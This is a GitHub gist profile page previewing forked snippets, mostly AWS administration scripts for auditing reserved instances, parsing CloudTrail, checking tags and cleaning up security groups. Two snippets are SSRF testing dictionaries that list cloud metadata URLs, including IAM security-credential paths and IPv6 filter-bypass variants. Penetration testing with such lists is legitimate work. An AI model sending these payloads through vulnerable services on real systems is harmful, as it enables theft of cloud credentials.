Skip to content

Instantly share code, notes, and snippets.

View acumenix's full-sized avatar

Acumenix acumenix

77 followers · 1.9k following
View GitHub Profile
@acumenix
acumenix / cloud_metadata.txt
Created February 5, 2019 21:45 — forked from jhaddix/cloud_metadata.txt
Cloud Metadata Dictionary useful for SSRF Testing
## AWS
# from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories
http://169.254.169.254/latest/user-data
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/ami-id
http://169.254.169.254/latest/meta-data/reservation-id
http://169.254.169.254/latest/meta-data/hostname
http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key
@acumenix
acumenix / riaudit.rb
Created August 9, 2019 04:56 — forked from cognusion/riaudit.rb
Simple script to audit AWS EC2 Reserved Instances vs Instances running.
#!/usr/bin/env ruby
# Audits your reserved instances vs your running instances, and reports back.
# If you want to run this from an AWS instance, its IAM Role must be granted at least the following:
#
#{
# "Statement": [
# {
# "Action": [
# "ec2:DescribeInstances",
@acumenix
acumenix / cloudTrailEventNames.list
Created August 23, 2019 06:25 — forked from pkazi/cloudTrailEventNames.list
List of values for parameter EventName in AWS Cloudtrail events
AbortDocumentVersionUpload
AbortEnvironmentUpdate
AbortMultipartUpload
AbortVaultLock
AcceptAccountMapping
AcceptCertificateTransfer
AcceptDelegate
AcceptDirectConnectGatewayAssociationProposal
AcceptFxPaymentCurrencyTermsAndConditions
AcceptHandshake
@acumenix
acumenix / README.md
Created August 23, 2019 06:25 — forked from magnetikonline/README.md
Python AWS CloudTrail parser class.

Python AWS CloudTrail parser

A Python parser class for CloudTrail event archives, previously dumped to an S3 bucket. Class provides an iterator which will:

  • Scan a given directory for archive files matching the required pattern.
  • Decompress each archive in memory.
  • Parse JSON payload and return each event in turn.

Parser contained in cloudtrailparser.py, with timezone.py used as a simple datetime.tzinfo concrete class implement to provide UTC timezone.

Example

@acumenix
acumenix / ec2TagCheck.py
Created August 23, 2019 06:26 — forked from kangks/ec2TagCheck.py
Lambda function triggered by CloudTrail events to check for tagging, and notify the owner through SES if tagging not found
import boto3
required_keys = [ "key01", "key02", "key03", "key04" ]
ses_source = '[email protected]'
ses_destination = ['[email protected]']
def lambda_handler(event, context):
if 'detail' in event and 'instance-id' in event['detail']:
ec2_instance_id = event['detail']['instance-id']
@acumenix
acumenix / index.js
Created August 23, 2019 06:27 — forked from adamgoucher/index.js
An AWS Lambda function which monitors CloudTrail logs created in the us-east-1 region for CreateHostedZone events and makes the corresponding private zone if they were public. The problem is that this can have a lag of up to 15 minutes.
var aws = require('aws-sdk');
var zlib = require('zlib');
var async = require('async');
var EVENT_SOURCE_TO_TRACK = /route53.amazonaws.com/;
var EVENT_NAME_TO_TRACK = /CreateHostedZone/;
var s3 = new aws.S3();
var route53 = new aws.Route53();
@acumenix
acumenix / cloud_metadata.txt
Created September 13, 2019 05:22 — forked from BuffaloWill/cloud_metadata.txt
Cloud Metadata Dictionary useful for SSRF Testing
## IPv6 Tests
http://[::ffff:169.254.169.254]
http://[0:0:0:0:0:ffff:169.254.169.254]
## AWS
# Amazon Web Services (No Header Required)
# from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories
http://169.254.169.254/latest/meta-data/iam/security-credentials/dummy
http://169.254.169.254/latest/user-data
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
@acumenix
acumenix / security-group-cleanup.py
Created October 8, 2019 20:45 — forked from TomRyan-321/security-group-cleanup.py
Security Group Cleanup using boto3 with RDS check fixed
#!/usr/bin/env python
import boto3
import argparse
def lookup_by_id(sgid):
sg = ec2.get_all_security_groups(group_ids=sgid)
return sg[0].name
@acumenix
acumenix / security-group-cleanup.py
Created October 8, 2019 20:46 — forked from snixon/security-group-cleanup.py
Fancy Security Group Cleanup
#!/usr/bin/env python
import os
import boto3
import argparse
import json
# `pip install -U PTable` will get you the right fork of PrettyTable
from prettytable import PrettyTable
from botocore.exceptions import ClientError
@acumenix
acumenix / inventory_vpcs.py
Created October 9, 2019 05:52 — forked from jezhumble/inventory_vpcs.py
List EC2, RDS and ElastiCache instances, grouped by VPC
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import argparse, sys, boto3
from colorama import Fore, Style
def count(my_list, my_key):
if my_key not in my_list:
return '0'
else: